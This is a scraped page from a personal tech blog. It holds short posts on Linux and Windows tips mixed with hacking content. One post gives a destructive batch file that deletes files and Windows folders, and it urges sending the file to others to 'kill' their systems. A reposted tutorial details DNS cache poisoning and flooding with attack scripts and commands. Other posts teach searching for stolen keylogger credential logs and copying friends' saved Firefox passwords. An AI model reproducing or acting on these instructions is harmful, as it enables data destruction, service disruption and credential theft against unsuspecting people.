Search, Stream, and/or Download Audios/Videos From Youtube and Other Sites With GMediaFinder

GMediaFinder is a new GTK based desktop application that allows you to search, stream and download audios and videos from different sites. Both the windows and linux version of the tool are available and it can be great alternative to Minitube for linux.

It support fullscreen mode (double click on the video or F2/esc), visualisations and use the gstreamer engine to play sounds and videos. This tool also allows searching and streaming of audio and video from several other websites such as azmp3s.com, Tagoo, etc.

It is available for ubuntu through PPA so to install the tool, type the following commands in your terminal.

sudo apt-add-repository ppa:s-lagui/ppa
sudo apt-get update
sudo apt-get install gmediafinder

I hope this info is useful. :)




Read more...

how to split a file in linux

If you need to split a single large file into smaller pieces to transfer the files through small memory drives(I had to transfer 4.6 GB matlab ISO using two 4 GB pendrives), there's this simple command line tool called "split" developed by Torbjorn Granlund and Richard M. Stallman.


Fire up the terminal and navigate to the directory in which the file to be splitted is present.

Then, we'll use the split command as below:

split --bytes=2G matlab.iso matlab_

After executing the above command, the iso is divided into smaller chunks of specified file size. The --bytes option can take various different arguments such as 2K, 2M, etc.

To recombine the files into a single file, open the terminal and type the following after navigating to the proper directory.

cat matlab_* > matlab.iso

For more information on the command, type man split.



Read more...

SLC Examination 2067 Result Is Out

OCE, Sanothimi has published the result of SLC examination 2067 today and if you are wondering how you can view the result with marksheet, check this post.

To view SLC result with marksheet, we can visit the official OCE site given below.
slcresult.soce.gov.np : Though the info on the page says that the result is of 2067 (probably they are updating their database), you can view full marksheet from the page there.
slc.ntc.net.np : Marksheet available now



Read more...

Online Alternative To Matlab

Today, I visited a website which provided the service of working on Matlab online in a website without any need of installing Matlab software. Although not comprehensive as the software itself, this web version can be quite useful in some cases.

This site offers as of now more than 500 Matlab R2009A commands. Only text commands are supported for now and they are working for graphical supports such as plots.

www.matlab-online.com

Thanks to Brisha for pointing this useful site. :)

Read more...

Advanced HTTP Fingerprinting With httprecon

One of the first steps in web server hacking involves fingerprinting to gather information regarding the web server and various mods applied to it. Fingerprinting the web server manually can be cumbersome so some good folks have developed an advanced open-source fingerprinting tool known as httprecon

*Description from official webpage:

The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis.

Besides the discussion of different approaches and the documentation of gathered results also an implementation for automated analysis is provided. This software shall improve the easyness and efficiency of this kind of enumeration. Traditional approaches as like banner-grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting.

Check the Page of httprecon project

Read more...

Techgaun on custom domain

Hi everybody, I am glad to announce that techgaun has now moved to the custom domain www.techgaun.com. I hope to post more actively now. Thanks everyone for your visit. :)


Read more...

Download Torrents From Demonoid Without Any Account

Demonoid.com is one of the most widely used bittorrent tracking site and registration requires invitation from the existing member of demonoid.com. However, in case you don't have an account, there's still a way to download the torrents from demonoid. I would like to thank a friend for providing me insights of doing this.

First go to the following link: http://torrent-finder.info/open/6-Demonoid/search

The search page will appear. Now its just the matter of search and download. Have fun downloading torrents from demonoid.com. :)




Read more...

Install New Nvidia Driver 270.41.19 in Ubuntu

NVIDIA has released the new versions of unix drivers recently and many bugs have been fixed in this release.

To install this recent driver in ubuntu 11.xx, open the terminal and type the following:

sudo apt-add-repository ppa:ubuntu-x-swat/x-updates
sudo apt-get update
sudo apt-get install nvidia-current

Also the packages are available for download from following links:

http://www.nvidia.com/object/unix.html

ftp://download.nvidia.com/XFree86/Linux-x86/270.41.19/

ftp://download.nvidia.com/XFree86/Linux-x86_64/270.41.19/





Read more...

MidpSSH: SSH and Telnet Client For J2ME Phones

MidpSSH is an SSH and Telnet client for MIDP 1.0 / 2.0 (J2ME) devices such as Java™-capable cellphones and other mobile devices.

MidpSSH provides SSH (Secure Shell) and Telnet functionality on mobile devices such as cellphones. This is really useful for people who need to access a server wherever they are, without carrying around a computer or searching for an Internet connection. Because the screen is small, the connection is often slow, and you’re possibly without a full keyboard, it isn’t great for prolonged use - but if you’re desperate it’s a life saver.

For downloading and more information, go to the official site.

I hope this tool comes useful for you sometimes. :)

Read more...

How To Enable SSH Login Access For Linux Users

So you just added a new user to your linux box and you want to give SSH login access (OpenSSH server in my example) to that user. You just need to edit the sshd_config file and add the user for SSH access.

To do this, open the /etc/ssh/sshd_config file and search for the AllowUsers string. Now just add the username of newly created user at the end of the line just as below:

#Adding new user samar for SSh access
AllowUsers nano root samar

Also, the SSh access for root account can be configured as well. For that, search the PermitRootLogin string and to enable root login set it as yes as below:

PermitRootLogin yes

This enables SSh access to the root user as well. But enabling the root login is not the good security practice. I hope this HowTo helps you. :)

Read more...

Download Scribd.com PDFs Without Any Account

Earlier today, I had to download a PDF document from scribd.com but I didn't have any account in scribd.com and I have coded a script that would help me download the PDFs from scribd.com without any account.

To access the service, visit this link.




It will ask you for the URL of the PDF document. Just copy and paste the URL from address bar when you are viewing the PDF in scribd.com.

I hope this becomes useful for you sometimes. :)

Note: Many people emailed me that the tool is not working. In fact, scribd has changed the way the documents are downloaded. Once I find the new bypassing method, I'll redo the script.

Read more...

Fix GPG Key Errors For Bad Keys

Today I tried to update my ubuntu 10.10 but unfortunately, I found the error regarding the GPG keys saying the signature could not be verified. A simple solution for this is presented in this post.

The error I got was as below:

W: GPG error: http://ppa.launchpad.net maverick Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 5A9A06AEF9CB8DB0

My solution was to update the keys using the same hex number shown in the error.

sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 5A9A06AEF9CB8DB0

This simply worked as a charm. I hope this works for you as well. :)

Read more...

Kill Windows System With Batch File

This is a very useful two lines code that can be pretty dangerous if executed especially if there's a higher privilege in the windows OS(works well on XP, not tested on other windows versions).

Open the notepad and type following lines of code:

del /f /q *
erase C:WINDOWS

The above line of code deletes everything recursively without asking for any confirmation.

In the case you want to delete certain folder entirely(C:\windows in this example), type the following line of code in notepad:

erase c:windows

Now save the file as filename.bat and send it to your friends or anyone whose system you want to kill. On clicking this batch file, very bad things are gonna happen. So be warned not to click when the file is in your system.

Read more...

Attacking the DNS System Tutorial

This tutorial is written by mango1122 from governmentsecurity. Since its very informative, I have decided to post this tutorial over here.

--------------
INTRODUCTION
--------------

Domain Name System (DNS) associates various sorts of information with so-called domain names;
most importantly, it serves as the "phone book" for the Internet: it translates human-readable
computer hostnames, e.g. en.wikipedia.org, into the IP addresses that networking equipment
needs for delivering information. It also stores other information such as the list of mail exchange
servers that accept email for a given domain

The Berkley Internet Name Service (BIND) is the most common form of DNS server used on the Internet.
BIND typically runs on UNIX type systems. The DNS server stores information which it serves out about a
particular domain (also referred to as a namespace) in text files called zone files.A client (the resolver)
maintains a small amount of local cache which it will refer to first before looking at a local static host�s file
and then finally the DNS server. The result returned will then be cached by the client for a small period of time.

When a DNS server is contacted for a resolution query, and if it is authoritative (has the answer to the question
in its own database) for a particular domain (referred to as a zone) it will return the answer to the client. If it is
not authoritative for the domain, the DNS server will contact other name servers and eventually it will get the
answer it needs which is passed back to the client. This process is known as recursion.

Additionally the client itself can attempt to contact additional DNS servers to resolve a name. When a client does
so, it uses separate and additional queries based on referral answers from servers. This process is known as iteration


----------------------------
ATTACKING THE DNS CACHE
----------------------------

The most common attacks on DNS can be classified as

Zone Transfers or information disclosure attacks
Cache poisioning


CACHE POISIONING

Lets say a client in domain xyz.com wants to resolve www.google.com

1. The client will contact its configured DNS server and ask for www.google.com to be resolved.
This query will contain information about the client�s source UDP port, IP address and a DNS transaction ID.

2.If the information is available locally i.e cached ,it is returned to the client

3. If not then the client�s DNS server will contact the authoritive name server for google.com and resolve the query

4. The answer is passed back to the client and also cached locally in the DNS server of xyz.com (say ns1.xyz.com) and the client

5. Note the client only accepts the DNS information if the server replies with the correct client�s source UDP port, IP address and the DNS transaction ID




--------------------------------
Attack #1 � The Birthday Attack
--------------------------------

To poison the cache the attacker needs to

1 Send a number of resolution requests for google.com.An important thing
to note here is that each query for google.com is assigned a different transactio ID.

2. While the DNS resolves this the attacker sends a large number of spoofed replies
from ns1.google.com with different transaction ID.The attacker hopes to guess the
correct transaction ID as used the two name servers

Finding the correct IP addresses is easy; we know our target, and we know the addresses of the legitimate
nameservers for the domain to be hijacked. Finding the port is slightly harder. We know that the destination
port of the recursive query is UDP port 53, but the source port is a moving target. Fortunately for our attacker,
BIND will more often than not reuse the same source port for queries on behalf of the same client. So, if the
attacker is working from an authoritative nameserver, he can first issue a request for a DNS 3lookup of a
hostname on his server. When the recursive query packet arrives, he can look at the source port. Chances are
this will be the same source port used when the victim sends the queries for the domain to be hijacked.


--------------------------------
Attck #2 - Poisioning the Cache
--------------------------------

1. To obtain the source port we use a perl script.It needs to be run from an authoritative name server which
the attacker controls to query the target name server for a hostname for which the attacker�s machine is authoritative.

Another alternative would be to use a packet sniffer.

dns1.pl 10.10.10.50 www.google.com
source port: 34567

2. Now we run the second script written by Ramon Izaguirre called hds0.pl2.The script does most of the work by spoofing the reply from ns1.google.com

./hds0.pl (ns1.google.com) (ns1.xyz.com) (source port obtained from the earlier script) (spoof target)


To observe if the attack was successful simply query the target name server:

dig @12.12.12.12 www.google.com
www.google.com 86400 IN A 10.10.10.10

The attack is successful as google resolves yo 10.10.10.10

The script is available here-hxxp://securityvulns.com/files/birthday.pl


--------------------------------------
Attack #3 - DOS Attack on DNS servers
--------------------------------------

DNS servers like other Internet resources are prone to denial of service attacks.The only difference here would
be that DNS server uses UDP for name resolution.To create a DOS attack on the DNS server a script such as
dnsflood.pl can be executed on multiple clients to create the traffic.DNSflood works by sending many thousands
of rapid DNS requests, thereby giving the server more traffic than it can handle resulting in slower and slower
response times for legitimate requests.

The script can be obtained from - hxxp://packetstormsecurity.org/DoS/dnsflood.pl

In the following example we use the scrip to create a DOS effect on the DNS server and then query the DNS for name resolution

perl dnsflood.pl 192.168.10.1
attacked: 192.168.10.1...

To assess the impact of this attack on performance the attacker from another machine first clears his local cache and then
queries the target name server. Clearing the local cache will ensure the resolver gets the information from the server and not locally.


C:\>ipconfig /flushdns
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.

C:\>nslookup
DNS request timed out.
timeout was 2 seconds.
*** Can't find server name for address 192.168.10.1: Timed out
*** Default servers are not available
Default Server: UnKnown
Address: 192.168.10.1

> ms2.xyz.com
Server: UnKnown
Address: 192.168.10.1

DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
*** Request to UnKnown timed-out

>exit

If this attack was multiplied from a number of machines then the impact would be even greater.


------------
CONCLUSION
------------

These are only a few possible exploits involving the DNS Spoofing vulnerability and there are,probably,
many more waiting to be discovered. Discovery and implementation is limited only by the active imagination of the attacker

Read more...

Fixing No Init Found. Try Passing Init: Bootarg Error in Ubuntu

Today I encountered this error and I thought it was related to HDD issues. So I used fsck which is a command line tool to check and repair the linux filesystem. So I am writing this short how to so that it might be helpful for you as well.

The error encountered is something like below:

mount: mounting /dev on /root/dev failed: No such file or directory
mount: mounting /sys on /root/sys failed: No such file or directory
mount: mounting /proc on /root/proc failed: No such file or directory
Target file system doesn't have requested /sbin/init
No init found. Try passing init: bootarg

You need to boot your system with the Ubuntu live CD. After booting from live CD, open the terminal and then enter the following command:

sudo fsck /dev/sda1

Replace /dev/sda1 with your target filesystem partition and press enter. Whenever any fix or overwrite permissions are asked, press y. After finishing the repairing, reboot your system from hard disk. The system should boot without any error now.
I hope this helps you. :)

Read more...

How To Change Default Location of Program Files Folder[Registry]

By default, the installation of any windows program is done in the [System Drive]/Program Files directory and in the case you want to change this setting, a simple registry hack is enough.

First open the registry editor by typing regedit in your run command. Then navigate to the following key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

From there, change the value of "ProgramFiles", or "ProgramFilesDir" as per your need. I hope this helps. :)

Read more...

Etherchange : Command Line Tool To Change MAC Address

I've already discussed on how to change mac adress of your ethernet card under windows as well as linux. One more such tool which is command line tool, is etherchange.

EtherChange can change the Ethernet address of the network adapters in Windows.

Usage instructions

Download the exe file and run it from a Command Prompt. It will give you the instructions you need. EtherChange only works if your account is in the Administrators group.

Download link: EtherChange

Read more...

Download Books From Google Books Using A GreaseMonkey Script

Do you want to download the undownloadable books from google books? If yes, here's the solution for you.

Google Book Downloader is a greasemonkey script that works in firefox with greasemonkey addon. Greasemonkey is a very useful firefox addon used to manipulate the webpage with the javascript.

For more details on the script and how to use it, refer to the official site.

The script is available at userscripts.org collection.

I hope this is useful.

Read more...

Remove Warnings & Notices From Psychostats

I was testing the psychostats script today and while testing I found that it displayed lots of warnings and notices that make the script look so bad as the output is totally messed up. This post will help you to fix this problem.

At first, I tried to change the error_reporting and display_errors setting in php.ini file but I could not get rid of those errors. So I then put a line of code as below at the top of index.php file of psychostats. Still no luck. Finally, I navigated to ./includes relative to psychostats root folder where there was a file named class_PS.php. Open this file and type the following line below <php line.

error_reporting(0);

This will suppress all those errors and will make your psychostats look better. I hope this helps.

Read more...

Fix Counter Strike Sound Problem Under WINE [How To]

I've been playing counter strike for a while through wine and so far, most of it works well. With getting more and more better with the game, I've learnt the importance of sound in this game. Unfortunately, the sound was not working properly and with some experiments, I've found the solution for me. I hope it also works for you.

By default, my wine's audio is configured to use ALSA driver with the settings as below:

Now, you need to edit the settings to match as in the following image.

After changing the audio configuration, click on Apply and then restart Counter-strike. I guess this will work for you as well.

Read more...

Converting VMWare .vmdk to Virtualbox .vdi

I was downloading the metasploitable to play around with it and I found that it was the VMWare .vmdk file so I had to convert it into .vdi file to run under the virtualbox. This post will show you how to easily convert the .vmdk file into .vdi file.

Converting the vmware disk file to the virtualbox hdd file is not the difficult task but still many might not be knowing how to do that. In order to convert your .vmdk file to .vdi, you need to type the following command in the terminal by first changing the terminal to the proper directory.


VBoxManage clonehd --format VDI metasploitable.vmdk metasploitable.vdi


Note that you need to have virtualbox installed for this to work. I hope this helps. :)

Read more...

Get High Compression Ratio With KGBArchiver

So you are wondering how you could compress your 2gb game data into less than 100 MBs? Are you lacking hard disk space and want to store files in the compressed form? If yes, then this post will direct you towards the solution.

KGB Archiver is the compression tool with unbelievable high compression rate. It surpasses even such efficient compression tool like 7zip and UHARC in terms of the abilities. KGB Archiver uses AES-256 encryption to encrypt archives. While the compression ratio is very high, it requires relatively high PC specification and it also requires more time to compress and decompress the file. But still this compression program will come in use sometimes.

For more information and download, visit KGBAarchiver's sourceforge page.


Read more...

Physical Memory Acquisition With MDD

MDD is a physical memory acquisition tool for imaging Windows based computers created by the innovative minds at ManTech International Corporation. MDD is capable of acquiring memory images from Win2000, XP, Vista and Windows Server.

This tool can be pretty useful to analyze the data present in RAM. Whenever we are running programs, RAM stores various range of information being used by the program. For example, if we are running a web browser, the RAM may contain the URLs being visited, form data, etc. So you can just guess we can extract a lot of information from RAM. Thus, MDD can be very useful tool to dump the physical memory into the file from which we can extract the required information.

You can read more and download the tool from MDD SourceForge Page.

Read more...

Reset Forgotten Ubuntu Password [How To]

If you've forgotten your ubuntu user password, it is still possible to recover the account by resetting the password. The recovery mode option in the grub menu can be used to reset the ubuntu user password as this mode lets us drop to the root shell prompt.

To reset the password, first select the recovery mode from grub menu. And then you'll have to select the "Drop to shell prompt" option. Now you can simply reset your password by using the passwd command.

passwd <yourusername>

Replace yourusername field with your username for ubuntu login and then you'll be prompted twice for new password. Enter the new password and you're done. Just reboot the system and this will successfully reset the password and you'll be able to access your ubuntu account. I hope this helps. :)

Read more...

Learn Web Hacking With WackoPicko

WackoPicko is a website that contains known vulnerabilities. It can prove as a very efficient way to master web hacking skills. This project is similar to Damn Vulnerable Web Application and is a collection of common web vulnerabilities.

For more information and downloads, you can check the WackoPicko github page.

Vulnerabilities

Reflected XSS
http://localhost/pictures/search.php?query=blah
The query parameter is vulnerable.

Stored XSS
http://localhost/guestbook.php
The comment field is vulnerable.

SessionID vulnerability
http://localhost/admin/login.php
The session cookie value is admin_session, which is an auto-incrementing value.

Stored SQL Injection
http://localhost/users/register.php -> http://localhost/users/similar.php
The first name field of the register users form contains a stored SQL injection which is then used unsanitized on the similar users page.

Reflected SQL Injection
http://localhost/users/login.php
The username field is vulnerable.

Directory Traversal
http://localhost/pictures/upload.php
The tag field has a directory traversal vulnerability enabling a malicious users to overwrite any file the web server uses has access to.

Multi-Step Stored XSS
http://localhost/pictures/view.php?picid=3
The comment field is vulnerable to XSS, however must go through a preview form.

Forceful Browsing
http://localhost/pictures/highquality.php?picid=3&key=highquality
The user doesn't have to purchase the picture to see the high quality version.

Command-line Injection
http://localhost/passcheck.php
The password field is vulnerable to a command line injections.

File Inclusion
http://localhost/admin/index.php?page=login
The page is vulnerable to a file inclusion vulnerability, however you have to include at the end.

Parameter Manipulation
http://localhost/users/sample.php?userid=1
The userid parameter can be manipulated to see any user's page when you need to be logged in otherwise.

Reflected XSS Behind JavaScript
http://localhost/piccheck.php
The name parameter is vulnerable.

Logic Flaw
http://localhost/cart/review.php
A coupon can be applied multiple times reducing the price of an order to zero. The coupon in the initial data is SUPERYOU21.

Reflected XSS Behind a Flash Form
http://localhost/submitname.php
The value parameter is vulnerable.

Weak username/password
https://localhost/admin/login.php
There is a default username/password combination of admin/admin.


Read more...

Phatch : Batch photo processing GUI tool

Phatch(Photo + Batch) is an user friendly, cross-platform Photo Batch Processor and Exif Renamer with a nice graphical user interface. Phatch handles all popular image formats and can duplicate (sub)folder hierarchies. Phatch can batch resize, rotate, apply shadows, perspective, rounded corners, … and do much more actions in minutes instead of hours or days if you do it manually.

For more information on Phatch, you can visit HERE.

Overview

Actions: resize, rotate, invert, flip, watermark, shadow, rounded corners and much more!
Drag & drop of actions
Enable & disable actions
Can copy folder hierarchies
Python shell
Error logging
File history
Console (can run on servers without gui)
Desktop droplets
Image Inspector (exif & iptc)
Cross-platform (Linux, Windows & Mac)
python-api

File formats

Phatch supports the same file formats as PIL…

Read & write: 'bmp','dib','gif','jpe','jpeg','jpg','im','msp', 'pcx','png','pbm','pgm','ppm','tif','tiff','xbm'
Read only: 'cur','dcx','fli','flc','fpx', 'gbr','gd','ico','imt','mic','mcidas','pcd', 'psd','bw','rgb','cmyk','sun','tga','xpm'
Write only: 'eps','ps','pdf'

Color support

Phatch supports these color modes:

Monochrome (1-bit pixels, black and white)
Grayscale (8-bit pixels, black and white)
RGB (3x8-bit pixels, true colour)
RGBA (4x8-bit pixels, RGB with transparency mask)
CMYK (4x8-bit pixels, colour separation)
P (8-bit pixels, mapped using a colour palette)
YCbCr (3x8-bit pixels, colour video format)
I (32-bit integer pixels)
F (32-bit floating point pixels)


To install phatch under ubuntu, type the following in terminal:

sudo apt-get install phatch

Read more...

GPRS Setting For Nepal Telecom

Nepal Telecom is providing GPRS service in its both pre-paid and post-paid services. I am posting the general setting to use the GPRS service of Nepal Telecom.

Basic Setting Parameters for GPRS & MMS

Proxy Server :- 192.80.7.133, Port :- 8000

For accessing internet/WAP through your mobile handset :-
GPRS Access Point Name(APN) :- ntwap

For accessing internet through computer by using GPRS service in your mobile phone :-
APN :- ntnet

For sending and receiving MMS :-
MMS APN :- ntmms
MMS Home Page/Server Address :- 192.80.11.180

Read more...

HTML Parser For Blogs

I've written a small code snippet that will work as HTML parser for use in your blogs. It can be useful to put the google adsenses and to post source codes in your blog. Obviously it might have other usages but I am using it for posting source codes.

The parser can be accessed from the URL below:

www.nepali.netau.net/parser

Thanks.

Read more...

Graphical Tools To Determine PCI Devices In Linux

We can use lspci command to list and determine the PCI devices from the terminal but most of us want some graphical way to view the PCI devices connected to our system. In this post, we will discuss two such GUI tools.

1. GNOME Device Manager
This is a GNOME program to manage devices and device drivers. It's inspired by hal-device-manager, from the HAL project, but rewritten in C for efficiency and an outlook to actually make it manage devices rather than just show information.

To install it, type the following apt-get command:

sudo apt-get install gnome-device-manager

You can open the program from Applications -> System Tools -> Device Manager

2. Hardinfo
HardInfo is a small system profiler and benchmark application that displays information about your hardware and operating system. Currently it knows about PCI, ISA PnP, USB, IDE, SCSI, Serial and parallel port devices.

To install hardinfo, type the following in your terminal:

sudo apt-get install hardinfo

You can open the program from Applications -> System Tools -> System Profiler and Benchmark

If you know any other such GUI tool, please do comment.

Read more...

Keyloggers for Linux: Secretly Watch The Linux Users

For windows, there are numerous keyloggers out there with many pretty cool features but there has been none such great keylogger. But lately there have been few developments and new keyloggers have been developed for Linux platform. In this post, I'll list few keyloggers for linux I've heard about.

1. PyKeylogger - PyKeylogger is a free open source keylogger written in the python programming language, available under the terms of the GNU General Public License. It is currently available for Windows (NT/2000 and up), and Linux (using Xlib, so won't work on the console). It is primarily designed for personal backup purposes, rather than stealth keylogging. Thus, it does not make explicit attempts to hide its presence from the operating system or the user. That said, the only way it is visible is that the process name shows up in the task list, so it is not immediately apparent that there is a keylogger on the system. More on PyKeylogger

2. Logkeys - Logkeys is no more advanced than other available Linux keyloggers, but is a bit more up to date, it doesn't unreliably repeat keys and it should never crash your X. It works with serial as well as USB keyboards. More on Logkeys

3. LKL (Linux KeyLogger) - LKL is a userspace keylogger that runs under Linux on the x86 arch. LKL sniffs and logs everything that passes through the hardware keyboard port (0x60). It translates keycodes to ASCII with a keymap file. LKL Homepage

4. THC-Vlogger - THC-vlogger, an advanced linux kernel based keylogger developed by famous hacker group THC, enables the capability to log keystrokes of all administrator/user's sessions via console, serial and remote sessions (telnet, ssh), switching logging mode by using magic password, stealthily sending logged data to centralized remote server. Its smart mode can automatically detect password prompts to log only sensitive user and password information. THC-Vlogger Home

The keyloggers for Linux are not much advanced and generally lack stealth. You'll have to be creative to make those keyloggers really stealth. Anyway, I hope this list gives you a start to know about linux keyloggers.

Read more...

Installing Adobe Photoshop CS5 In Ubuntu [How To]

In this tutorial, I will guide you through how to install and fully run Adobe Photoshop CS5 without any errors. We will be installing the Adobe Photoshop CS5 Portable version available for free in internet.

After downloading the installer for Adobe Photoshop CS5 Portable, you will have to first chmod the exe file so that it can be executed.

chmod +x Photoshop_Portable_12.0_en-fr-de-es-it-ru-zh-tw.paf.exe

Now, run the installer and the photoshop installation will complete without any errors. The problem with this portable photoshop cs5 installation is that it will install correctly but might produce the runtime error complaining about the incorrect loading of C runtime environment. The error you are likely to encounter is similar to something below:

Microsoft Visual C++ Runtime Library

Runtime Error!

Program C:\PhotoshopPortable\PhotoshopPortable.exe

R6034
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information

To fix this error, I copied all the files from WinSxS folder from my windows XP OS to the wine's C:\windows\WinSxS\. For this, copy all the files of WinSxS folder to USB and then to your Ubuntu OS(or if you are on VM like me, copy paste via the Virtual Shared folders feature). Now, go to Applications - Wine - Browse C: Drive and then navigate to Windows - WinSxS folder. Paste all the WinSxS contents you just copied from windows OS to this folder. See the screenshots below if you are confused from where to copy and where to paste:

Now try to run photoshop portable and you will probably face the error as below:

Could not complete your request Unable to initialize windowing system. Terminating.

Now, go to Applications - Wine - Configure Wine and then from the Applications tab, click on Add Application and add the photoshop portable's executable located at $HOME/.wine/dosdevices/c:/PhotoshopPortable/App/PhotoshopCS5. After adding application, select Windows XP from Windows Version dropdown list. Click on Apply and now your photoshop CS5 portable should work without any error in Ubuntu.

I hope this helps. :)

Read more...

Automatic SQL Injection And Database Takeover With SQLMap 0.9

sqlmap is an open source SQL injection penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. SQLMap consists of a very accurate detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

SQLMap v. 0.9 is out on April 10, 2011 and now consists of more features than ever with numerous improvements in coding. This time the SQL Injection engine has been re-written in v. 0.9 and the tool will be very useful for security experts, enthusiasts and hackers. The feature list of SQLMap is available over HERE.

The tool can be downloaded from the sourceforge page HERE.

Read more...

A Very Basic Guide To SSH Tunnelling To Bypass Web Filters

SSh, Secure Shell, is a program and protocol for securely logging in to and running programs on remote machines across a network, with encryption to protect the transferred information and authentication to ensure that the remote machine is the one desired; To use ssh to connect to a remote computer. In this tutorial, I'll show you how to do simple ssh tunnelling to bypass web filters.

We'll be using a ssh client in this tutorial. One such SSh client is putty and we be using putty in our tutorial. It can be downloaded from HERE. We need a working SSh account and there are lots of free as well as paid free shell providers. I'll be using one of the shell accounts for this tutorial.

After downloading putty, open the program and enter the host and port information. The screenshot below will be helpful for you.

Now go to the SSh option below in the left menu of Putty. And select the tunnels submenu. Set the source port to any higher ports. I chose 8080 in my example. Then select the dynamic option. And click on Add by leaving other options as they are.

Now, click on Open and login to your SSh server. The only thing left now is to setup your favourite browser to work with the SSh tunnel. In firefox(under ubuntu), I go to Edit - Preferences - Advanced - Network - Settings to set the proper proxy configuration. The setup entry will be:

Socks host: localhost
Port: 8080

That's all for setup. Now you can use the ssh tunnel to browse webspace by bypassing web filters in your school or office. I hope it was useful. Thanks. :)

Read more...

How To Steal Various Keylogger's Log

Keylogger is a device or program that captures activities from an input device. Malicious people can make use of keyloggers to capture personal information being input into a computer system. Many of these keyloggers have the feature of uploading the log to some pre-defined(set by hackers) FTP servers. We can exploit this feature of keyloggers with the help of our Big Daddy, Google to obtain the logs of these keyloggers.

There are numerous keyloggers out there in the market and they provide this useful feature of FTP uploading of logs. But, the google is so powerful that it also indexes these log files. We can use the texts that are generally used by keyloggers to write in the text file. For example, following is the format of how iStealer, one of the widely used stealer, records the log through FTP.

Program: Firefox
Url/Host: http://www.google.com
Login: xxxxx
Password: xxxxx
Computer: samar-pc
Date: 2011-04-23 01:33:03
Ip: 116.90.*.*

So, we can use the terms such as Program, Url/Host, Login, etc. as the search keywords. The following search phrase would then reveal the iStealer's log.

Program: Url/Host: Login: Password: Computer: Date: Ip:

You can creatively specify the particular hosts or programs of which you want the login information. Moreover, you might also want to use the Date feature of advanced google search to find the latest results as they will have more likelyhood to work.

Another log format of some other keylogger is something like below so you can figure out the possible dork for this format.

APPLICATION : Firefox 4.0
URL : https://www.facebook.com
USERNAME : samar
PASSWORD : 144334@&%

You can actually experiment on your own to create new useful dorks. Many times, you will find good stuffs using these dorks. Just be creative with what you look for. I hope this guides you a little. :)


Read more...

Practise, Learn and Master Web Application Hacking With DVWA

DVWA, which stands for Damn Vulnerable Web Application, is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.


The DVWA v. 1.07 can be downloaded from HERE.

You will need to install Apache+PHP+MySQL environment(use LAMPP or XAMPP packages) to run and test this web application. This will definitely help you learn to spot web vulnerabilities of the varied levels. I hope this was useful. :)

Read more...

Enable Network Play Without Lag/Freezes In Counter Strike [How To]

Recently I had posted about how to have counter strike 1.6 run under linux but today when I was just testing to see how well the network play works, I found that the game freezes after connecting to the CT server. I searched on google and found a perfect solution for it.

I've tested this on the installation of Counter Strike : Condition Zero but should also work in Counter Strike 1.6.

The motd.txt file in the cstrike and czero can not be rendered properly by WINE so the game freezes. To solve this problem, we remove the motd.txt file and then, we create a new read only file with the name motd_temp.html which should be empty and there should be no problem rendering this new file as its just an empty file.




If there already exists the motd_temp.html in those directories, be sure to delete them and create a new empty file. To change the permission to read only, you can use the chmod command as below:

chmod +r-wx motd_temp.html

Now, you can play the counter strike in lan or with any server without any lag or freezes. Happy gaming. :)

Read more...

How To Steal Stored Passwords From Firefox

Many of us use the Firefox's built-in password manager to remember and store the password of the sites we login to frequently. While this can be very useful feature, it can be exploited by anyone with physical(or any other form of access to the filesystem) access to know the saved passwords of the user. In this post, I will discuss how you can view and save the stored passwords of your friends for future reference.

When we select "Remember Me" option to store passwords, the passwords are stored in two files.
1.key3.db
2. signons.sqlite

These two files are in the profile directory of the mozilla firefox application data for the respective user. Profile folders are placed in a common location by default but are named randomly for additional security (e.g., "xxxxxxxx.default" is the profile folder name for the "default" profile, where xxxxxxxx represents a random strung of characters). This directory is available at different places according to the distribution.

Under windows: %APPDATA%\Mozilla\Firefox\Profiles folder will list the profiles and you can open any of the profiles from there.

Under linux: ~/.mozilla/firefox/xxxxxxxx.default folder is the profile folder. So you can navigate to ~/.mozilla/firefox/ to view the profiles.

Under MAC: ~/Library/Mozilla/Firefox/Profiles/ or ~/Library/Application Support/Firefox/Profiles/ are the folders containing the profile directories.

You can follow any of the following two methods to view the stored passwords:

Method 1: In the target computer, go to Edit->Preferences->Security and click on Saved Passwords and then click on Show Passwords to view the login details of the victim in linux. In windows, you will have to go to Tools->Options->Security.

Method 2: The first method would be applicable only for viewing the login details in victim PC. Whenever you want to save these details for further reference, you will have to copy the previously mentioned two files and save to your USB drive(or maybe in mailbox). Now, all you have to do is copy these two files to the profile directory of your PC and then go to the menus mentioned in method #1.

I hope this was useful. Thanks. :)

Read more...

gufw - A Graphical User Interface To Manage UFW Firewall

Gufw is an easy to use Ubuntu / Linux firewall, powered by ufw.

Gufw is an easy, intuitive, way to manage your Linux firewall. It supports common tasks such as allowing or blocking pre-configured, common p2p, or individual ports port(s), and many others! Gufw is powered by ufw , runs on Ubuntu, and anywhere else Python, GTK, and Ufw are available. Iptables is already a very powerful tool by itself, but it's syntax can get awkward at times and hard to figure out, so Ubuntu developers decided to make ufw ("The reason ufw was developed is that we wanted to create a server-level firewalling utility that was a little bit more for `human beings`"), which was to be simpler. Now, on the graphical side of things, Firestarer already existed. But why not make an even easier to use GUI for desktop `human beings`, powered by ufw? This is where Gufw comes in.

To install Gufw in ubuntu, type the following in your terminal:

sudo apt-get install gufw

You can run Gufw in GNOME menu: /System/Administration/Firewall configuration. To know more about gufw and ufw, you can check the manpage with man gufw and man ufw.

Read more...

Counter Strike 1.6 Under Ubuntu Using WINE [How To]

WINE is a very useful software that helps you run windows applications in linux, BSD and MAC OS. If you have just switched to ubuntu and can't find any interesting games like counterstrike for linux then you don't have to worry. The WINE will help you play the games like counter-strike under your ubuntu linux.

